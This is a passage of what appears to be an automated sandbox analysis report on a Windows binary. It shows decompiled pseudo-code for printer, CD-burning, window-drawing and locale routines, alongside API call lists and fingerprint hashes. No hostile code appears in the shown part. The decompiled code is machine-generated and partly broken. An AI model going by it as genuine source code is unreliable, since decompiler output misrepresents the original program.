      0x0042fc30
      0x0042fc30
      0x00000000

      APIs
      • 73802130.WINSPOOL.DRV(00000001,00000000,00000005,00000000,00000000,?,?,00000000,0042FC31,?,00000000,?,?,?,0042F7FC), ref: 0042FAA1
      • GetLastError.KERNEL32(00000001,00000000,00000005,00000000,00000000,?,?,00000000,0042FC31,?,00000000,?,?,?,0042F7FC), ref: 0042FAAA
      • GetLastError.KERNEL32(00000001,00000000,00000005,00000000,00000000,?,?,00000000,0042FC31,?,00000000,?,?,?,0042F7FC), ref: 0042FAB4
        • Part of subcall function 00406A3C: LoadStringA.USER32 ref: 00406A6E
      • 73802130.WINSPOOL.DRV(00000001,00000000,00000005,00000000,?,?,?,00000000,0042FBF1,?,00000001,00000000,00000005,00000000,00000000,?), ref: 0042FB0F
      • GetProfileStringA.KERNEL32(windows,device,0042FC40,?,000003FF), ref: 0042FB3F
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: 73802130.ErrorLastString$LoadProfile
      • String ID: =B$device$windows
      • API String ID: 2222313407-4087766923
      • Opcode ID: 762da815830e6ad0f2b2987def458d100c3172ad45ac9bc41ba0ec8fd2994b88
      • Instruction ID: 823ffd02ebeb7dd9bdfae32b8f011756aee21cb2ea758bb367f733c8e6de3ac0
      • Opcode Fuzzy Hash: 762da815830e6ad0f2b2987def458d100c3172ad45ac9bc41ba0ec8fd2994b88
      • Instruction Fuzzy Hash: 47517471B002189FDB10DF66DC42B9EB7F8EB48704FA084BBF504E7291DA78AD458B59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004816FC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 148COMMON
      Download Yara Rule
      C-Code - Quality: 42%
      			E004816FC(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _t64;
				char _t72;
				intOrPtr _t86;
				intOrPtr _t97;
				char _t109;
				intOrPtr _t121;
				void* _t136;
				void* _t139;

				_t146 = __fp0;
				_t134 = __edi;
				_push(__ebx);
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v8 = 0;
				_t136 = __eax;
				_push(_t139);
				_push(0x4818f4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139 + 0xffffffd0;
				E00481A5C(__eax);
				if( *((intOrPtr*)(_t136 + 0xd8)) == 0) {
					_t64 =  *0x490c50; // 0x0
					E0047FD7C(_t64, __ebx, 0, "CdvdBurnerGrabber_Create (before create)", __edi, _t136, __fp0);
					if( *((char*)(_t136 + 0x18)) != 1) {
						_push(0);
						_push(E00404F00( *((intOrPtr*)(_t136 + 0xc0))));
						_push(0);
						_push(E0047C854);
						_push(_t136 + 0x4e8);
						_push(_t136 + 0xe4);
						_push(0x400);
						_push(_t136 + 0xe8);
						_t72 = _t136 + 0xd8;
						_push(_t72);
						L00465E04();
						 *((char*)(_t136 + 0xe0)) = _t72;
					} else {
						_push(0);
						_push( *((intOrPtr*)(_t136 + 0xc)));
						_push( *((intOrPtr*)(_t136 + 0xb)));
						_push( *((intOrPtr*)(_t136 + 0xa)));
						_push( *((intOrPtr*)(_t136 + 9)));
						_push(0);
						_push(E0047C854);
						_push(_t136 + 0x4e8);
						_push(_t136 + 0xe4);
						_push(0x400);
						_push(_t136 + 0xe8);
						_t109 = _t136 + 0xd8;
						_push(_t109);
						L00465DFC();
						 *((char*)(_t136 + 0xe0)) = _t109;
					}
					_t111 =  *((intOrPtr*)(_t136 + 0xe0));
					if( *((intOrPtr*)(_t136 + 0xe0)) == 0) {
						_push("CdvdBurnerGrabber_Create (after create): PortID:");
						E004091E4( &_v40);
						_push(_v40);
						_push(0x4819d4);
						_push("BusID:");
						E004091E4( &_v44);
						_push(_v44);
						_push(0x4819d4);
						_push("TargetID:");
						E004091E4( &_v48);
						_push(_v48);
						_push(0x4819d4);
						_push("LUN:");
						E004091E4( &_v52);
						_push(_v52);
						E00404DC0();
						_t86 =  *0x490c50; // 0x0
						E0047FD7C(_t86, _t111, 0, _v36, _t134, _t136, _t146);
					} else {
						_v32 = 0;
						_v28 = 0;
						_v24 =  *((intOrPtr*)(_t136 + 0xe4));
						_v20 = 0;
						_v16 = _t136 + 0xe8;
						_v12 = 6;
						E0040A164("StarBurn_CdvdBurnerGrabber_Create() failed, exception %d, status %d, text \"%s\"", 2,  &_v32,  &_v8);
						E00404A94(_t136 + 4, _v8);
						_t97 =  *0x490c50; // 0x0
						E0047FD7C(_t97, _t111, 0,  *((intOrPtr*)(_t136 + 4)), _t134, _t136, _t146);
						E0040CBEC( *((intOrPtr*)(_t136 + 4)), 1);
						E004043D0();
					}
				}
				_pop(_t121);
				 *[fs:eax] = _t121;
				_push(0x4818fb);
				E00404A64( &_v52, 5);
				return E00404A40( &_v8);
			}























      0x004816fc
      0x004816fc
      0x00481702
      0x00481706
      0x00481709
      0x0048170c
      0x0048170f
      0x00481712
      0x00481715
      0x00481718
      0x0048171c
      0x0048171d
      0x00481722
      0x00481725
      0x0048172a
      0x00481736
      0x00481743
      0x00481748
      0x00481751
      0x0048179b
      0x004817a8
      0x004817a9
      0x004817b0
      0x004817b7
      0x004817be
      0x004817bf
      0x004817ca
      0x004817cb
      0x004817d1
      0x004817d2
      0x004817d7
      0x00481753
      0x00481753
      0x00481758
      0x0048175c
      0x00481760
      0x00481764
      0x00481765
      0x0048176c
      0x00481773
      0x0048177a
      0x0048177b
      0x00481786
      0x00481787
      0x0048178d
      0x0048178e
      0x00481793
      0x00481793
      0x004817dd
      0x004817e5
      0x00481852
      0x0048185f
      0x00481864
      0x00481867
      0x0048186c
      0x00481879
      0x0048187e
      0x00481881
      0x00481886
      0x00481893
      0x00481898
      0x0048189b
      0x004818a0
      0x004818ad
      0x004818b2
      0x004818bd
      0x004818c7
      0x004818cc
      0x004817e7
      0x004817ef
      0x004817f2
      0x004817fc
      0x004817ff
      0x00481809
      0x0048180c
      0x0048181d
      0x00481828
      0x00481832
      0x00481837
      0x00481846
      0x0048184b
      0x0048184b
      0x004817e5
      0x004818d3
      0x004818d6
      0x004818d9
      0x004818e6
      0x004818f3

      APIs
        • Part of subcall function 00481A5C: StarBurn_Destroy.STARBURN(00000000,?,0048172F,00000000,004818F4), ref: 00481A87
      • StarBurn_CdvdBurnerGrabber_Create.STARBURN(00000000,00000000,00000400,00000000,?,Function_0007C854,00000000,?,?,?,?,00000000,00000000,004818F4), ref: 0048178E
      • StarBurn_CdvdBurnerGrabber_CreateEx.STARBURN(00000000,00000000,00000400,00000000,?,Function_0007C854,00000000,00000000,00000000,00000000,004818F4), ref: 004817D2
      Strings
      • BusID:, xrefs: 0048186C
      • TargetID:, xrefs: 00481886
      • LUN:, xrefs: 004818A0
      • CdvdBurnerGrabber_Create (before create), xrefs: 0048173E
      • StarBurn_CdvdBurnerGrabber_Create() failed, exception %d, status %d, text "%s", xrefs: 00481818
      • CdvdBurnerGrabber_Create (after create): PortID:, xrefs: 00481852
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_Star$BurnerCdvdCreateGrabber_$Destroy
      • String ID: BusID:$CdvdBurnerGrabber_Create (after create): PortID:$CdvdBurnerGrabber_Create (before create)$LUN:$StarBurn_CdvdBurnerGrabber_Create() failed, exception %d, status %d, text "%s"$TargetID:
      • API String ID: 897743036-257372085
      • Opcode ID: dbd705ae994ed7c30d444fd035a5b039dcbe4b66d8fedb13bb96a1e67ebe14bd
      • Instruction ID: bca3912076bf07049f71ac61b04f681004821ad8420b748fe0bb8cbc6c77e5c2
      • Opcode Fuzzy Hash: dbd705ae994ed7c30d444fd035a5b039dcbe4b66d8fedb13bb96a1e67ebe14bd
      • Instruction Fuzzy Hash: 075181706046449ED711EBA5C851BDFB7FCAF48304F10883BE19AF7291D778A9058B68
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00438258 Relevance: 13.7, APIs: 9, Instructions: 172COMMON
      Download Yara Rule
      C-Code - Quality: 93%
      			E00438258(intOrPtr* __eax, void* __ecx) {
				intOrPtr _v8;
				struct tagRECT _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __ebp;
				void* _t85;
				intOrPtr* _t150;
				void* _t152;
				void* _t158;
				intOrPtr _t165;
				void* _t181;
				signed int _t183;
				void* _t186;
				void* _t188;
				void* _t190;
				intOrPtr _t191;

				_t152 = __ecx;
				_t188 = _t190;
				_t191 = _t190 + 0xffffffdc;
				_push(_t181);
				_t150 = __eax;
				_t85 = E004492C0(__eax, _t158);
				_t193 =  *((char*)(_t150 + 0x165));
				if( *((char*)(_t150 + 0x165)) == 0) {
					return _t85;
				} else {
					_v8 = E00426448(_t152, 1);
					 *[fs:eax] = _t191;
					E00443504(_v8, _t150);
					 *((intOrPtr*)( *_t150 + 0x44))( *[fs:eax], 0x438481, _t188);
					E004262F8( *((intOrPtr*)(_v8 + 0x14)),  *_t150,  *((intOrPtr*)(_t150 + 0x70)), _t181, _t188, _t193);
					E004266D8(_v8,  &_v24);
					InflateRect( &_v24, 0xffffffff, 0xffffffff);
					E004266D8(_v8,  &_v24);
					if( *((char*)(_t150 + 0x165)) != 0) {
						_t186 = 0;
						if( *((char*)(_t150 + 0x163)) != 0) {
							_t186 = 0 +  *((intOrPtr*)(_t150 + 0x168));
						}
						if( *((char*)(_t150 + 0x164)) != 0) {
							_t186 = _t186 +  *((intOrPtr*)(_t150 + 0x168));
						}
						_t199 = _t186;
						if(_t186 == 0) {
							 *((intOrPtr*)( *_t150 + 0x44))();
							E004262F8( *((intOrPtr*)(_v8 + 0x14)),  *_t150,  *((intOrPtr*)(_t150 + 0x70)), _t181, _t188, _t199);
							E004266D8(_v8,  &_v24);
							InflateRect( &_v24, 0xffffffff, 0xffffffff);
							E004266D8(_v8,  &_v24);
						}
						 *((intOrPtr*)( *_t150 + 0x44))();
						E004442C8(_t150,  &_v40);
						_t183 = GetWindowLongA(E00426B00(_v8), 0xfffffff0);
						if(( *(_t150 + 0x162) & 0x00000001) != 0) {
							_v40 = _v40 - _t186;
						}
						if(( *(_t150 + 0x162) & 0x00000002) != 0) {
							_v36 = _v36 - _t186;
						}
						if(( *(_t150 + 0x162) & 0x00000004) != 0) {
							_v32 = _v32 + _t186;
						}
						if((_t183 & 0x00200000) != 0) {
							_v32 = _v32 + GetSystemMetrics(0x14);
						}
						if(( *(_t150 + 0x162) & 0x00000008) != 0) {
							_v28 = _v28 + _t186;
						}
						if((_t183 & 0x00100000) != 0) {
							_v28 = _v28 + GetSystemMetrics(0x15);
						}
						DrawEdge(E00426B00(_v8),  &_v24,  *0x0048E8D4 |  *0x0048E8E4,  *0x0048E8F4 |  *0x0048E904 | 0x00002000);
						_v24.left = _v24.right - GetSystemMetrics(0xa) - 1;
						if(E00436A04(_t150) == 0) {
							DrawFrameControl(E00426B00(_v8),  &_v24, 3, 0x4005);
						} else {
							DrawFrameControl(E00426B00(_v8),  &_v24, 3, 0x4005);
						}
					}
					_pop(_t165);
					 *[fs:eax] = _t165;
					_push(0x438488);
					return E00403BF0(_v8);
				}
			}






















      0x00438258
      0x00438259
      0x0043825b
      0x00438260
      0x00438261
      0x00438265
      0x0043826a
      0x00438271
      0x0043848e
      0x00438277
      0x00438283
      0x00438291
      0x00438299
      0x004382a5
      0x004382b1
      0x004382bc
      0x004382c9
      0x004382d4
      0x004382e0
      0x004382e6
      0x004382ef
      0x004382f1
      0x004382f1
      0x004382fe
      0x00438300
      0x00438300
      0x00438306
      0x00438308
      0x00438311
      0x0043831d
      0x00438328
      0x00438335
      0x00438340
      0x00438340
      0x0043834c
      0x00438354
      0x00438369
      0x00438372
      0x00438374
      0x00438374
      0x0043837e
      0x00438380
      0x00438380
      0x0043838a
      0x0043838c
      0x0043838c
      0x00438395
      0x0043839e
      0x0043839e
      0x004383a8
      0x004383aa
      0x004383aa
      0x004383b3
      0x004383bc
      0x004383bc
      0x00438417
      0x00438429
      0x00438435
      0x00438466
      0x00438437
      0x0043844b
      0x0043844b
      0x00438435
      0x0043846d
      0x00438470
      0x00438473
      0x00438480
      0x00438480

      APIs
        • Part of subcall function 00426448: RtlInitializeCriticalSection.KERNEL32(00429B3C,00429B04,?,00000001,00429C9A,?,?,?,0042AF0D,?,?,0042AD2C,?,0000000E,00000000,?), ref: 00426468
        • Part of subcall function 004266D8: FrameRect.USER32 ref: 00426700
      • InflateRect.USER32(?,000000FF,000000FF), ref: 004382C9
      • InflateRect.USER32(?,000000FF,000000FF), ref: 00438335
      • GetWindowLongA.USER32 ref: 00438364
      • GetSystemMetrics.USER32 ref: 00438399
      • GetSystemMetrics.USER32 ref: 004383B7
      • DrawEdge.USER32(00000000,?,00000000,00000008), ref: 00438417
      • GetSystemMetrics.USER32 ref: 0043841E
      • DrawFrameControl.USER32 ref: 0043844B
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MetricsRectSystem$DrawFrameInflate$ControlCriticalEdgeInitializeLongSectionWindow
      • String ID:
      • API String ID: 1475008941-0
      • Opcode ID: 367d3d62cdd68b0dc0c134d88507c1d988ae4613bfd9ea01ec77b41b4e45260e
      • Instruction ID: a05311cb189b6b3b8744b24664c8cde6b5f5e5c603b090cd8f13cc16a4a2e353
      • Opcode Fuzzy Hash: 367d3d62cdd68b0dc0c134d88507c1d988ae4613bfd9ea01ec77b41b4e45260e
      • Instruction Fuzzy Hash: B861D530A002059BDB00EF65CC85BDEB7F5AF49304F5401BABC04BB296DB39AE05CB65
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00444544 Relevance: 13.6, APIs: 9, Instructions: 150COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00444544(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x4446f0; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x4446e8; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x4446f0; // 0x0
				if(_t113 != (_t107 &  *0x4446ec)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x4446f0; // 0x0
				if(_t114 != (_t107 &  *0x4446f4)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E00425DCC( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00425DB0( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













      0x0044454b
      0x0044454e
      0x00444550
      0x00444555
      0x004446d2
      0x004446d2
      0x004446d7
      0x004446e4
      0x004446e4
      0x0044455f
      0x00444569
      0x00444561
      0x00444561
      0x00444561
      0x00444572
      0x00444586
      0x00444574
      0x00444582
      0x00444582
      0x0044458c
      0x004445a5
      0x0044458e
      0x0044459c
      0x0044459c
      0x004445ac
      0x004445e6
      0x004445e9
      0x004445b4
      0x004445b7
      0x004445db
      0x004445e0
      0x004445b9
      0x004445ca
      0x004445cc
      0x004445cc
      0x004445b7
      0x004445f0
      0x004445f5
      0x00444639
      0x004445fd
      0x00444605
      0x00444630
      0x00444607
      0x0044461c
      0x0044461c
      0x00444605
      0x00444651
      0x0044465f
      0x00444667
      0x0044467a
      0x0044467a
      0x00444688
      0x00444690
      0x004446a3
      0x004446a3
      0x004446ad
      0x004446cd
      0x004446cd
      0x00000000

      APIs
      • MulDiv.KERNEL32(?,?,?), ref: 0044457D
      • MulDiv.KERNEL32(?,?,?), ref: 00444597
      • MulDiv.KERNEL32(?,?,?), ref: 004445C5
      • MulDiv.KERNEL32(?,?,?), ref: 004445DB
      • MulDiv.KERNEL32(?,?,?), ref: 00444613
      • MulDiv.KERNEL32(?,?,?), ref: 0044462B
      • MulDiv.KERNEL32(?,?,0000001F), ref: 00444675
      • MulDiv.KERNEL32(?,?,0000001F), ref: 0044469E
      • MulDiv.KERNEL32(00000000,?,0000001F), ref: 004446C4
        • Part of subcall function 00425DCC: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425DD9
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: a369b7d4af042cbc11d91c21c57002bb756c2415325cb00f98c73500d544247a
      • Instruction ID: 53bfc22628fe924410b9341a070d667e14512c41555d7ee83f6bc035f422ebbb
      • Opcode Fuzzy Hash: a369b7d4af042cbc11d91c21c57002bb756c2415325cb00f98c73500d544247a
      • Instruction Fuzzy Hash: 6E511D70608741AFE721DB69C845B6BB7E9AF86304F04481EBAD5C7392C63DE844CB25
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004453F0 Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
      Download Yara Rule
      C-Code - Quality: 37%
      			E004453F0(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				struct HDC__* _t33;
				intOrPtr _t72;
				int _t74;
				intOrPtr _t80;
				int _t83;
				void* _t88;
				int _t89;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = _t93;
				_t94 = _t93 + 0xffffffe0;
				_v5 = __ecx;
				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				}
				_v12 = GetDesktopWindow();
				_push(0x402);
				_push(0);
				_t33 = _v12;
				_push(_t33);
				L00407660();
				_v16 = _t33;
				_push(_t92);
				_push(0x44550b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_v20 = SelectObject(_v16, E0042632C( *((intOrPtr*)(_t88 + 0x40))));
				_t89 = _v36;
				_t83 = _v32;
				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x445512);
				_push(_v16);
				_t72 = _v12;
				_push(_t72);
				L004078C0();
				return _t72;
			}





















      0x004453f1
      0x004453f3
      0x004453f9
      0x00445405
      0x0044540b
      0x0044541b
      0x00445422
      0x00445423
      0x00445424
      0x00445425
      0x00445426
      0x0044540d
      0x0044540d
      0x00445414
      0x00445415
      0x00445416
      0x00445417
      0x00445418
      0x00445418
      0x0044542c
      0x0044542f
      0x00445434
      0x00445436
      0x00445439
      0x0044543a
      0x0044543f
      0x00445444
      0x00445445
      0x0044544a
      0x0044544d
      0x00445462
      0x0044546e
      0x00445476
      0x00445483
      0x004454a5
      0x004454c4
      0x004454de
      0x004454eb
      0x004454f2
      0x004454f5
      0x004454f8
      0x00445500
      0x00445501
      0x00445504
      0x00445505
      0x0044550a

      APIs
      • GetDesktopWindow.USER32 ref: 00445427
      • 73BEACE0.USER32(?,00000000,00000402), ref: 0044543A
      • SelectObject.GDI32(?,00000000), ref: 0044545D
      • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00445483
      • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004454A5
      • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004454C4
      • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004454DE
      • SelectObject.GDI32(?,?), ref: 004454EB
      • 73BEB380.USER32(?,?,00445512,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 00445505
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ObjectSelect$B380DesktopWindow
      • String ID:
      • API String ID: 989747725-0
      • Opcode ID: 5ee985242bb9f1b2984d71d21acc70f8da3ac16fb6056f9344197e33d3ab406f
      • Instruction ID: 4076bfeecb81f29f362ff675aa21a8d639f731f852e736a6dcacc3e06134783b
      • Opcode Fuzzy Hash: 5ee985242bb9f1b2984d71d21acc70f8da3ac16fb6056f9344197e33d3ab406f
      • Instruction Fuzzy Hash: A0310A72E04619AFDB00DEEDDC89DAFBBBCEF09704B404465B904F7241C679AD048B64
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040DD64 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
      Download Yara Rule
      C-Code - Quality: 72%
      			E0040DD64(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40e02f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040DBEC();
				E0040C4D0(__ebx, __edi, __esi);
				_t196 =  *0x49074c;
				if( *0x49074c != 0) {
					E0040C6A8(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0040C420(_t43, 0, 0x14,  &_v20);
				E00404A94(0x490680, _v20);
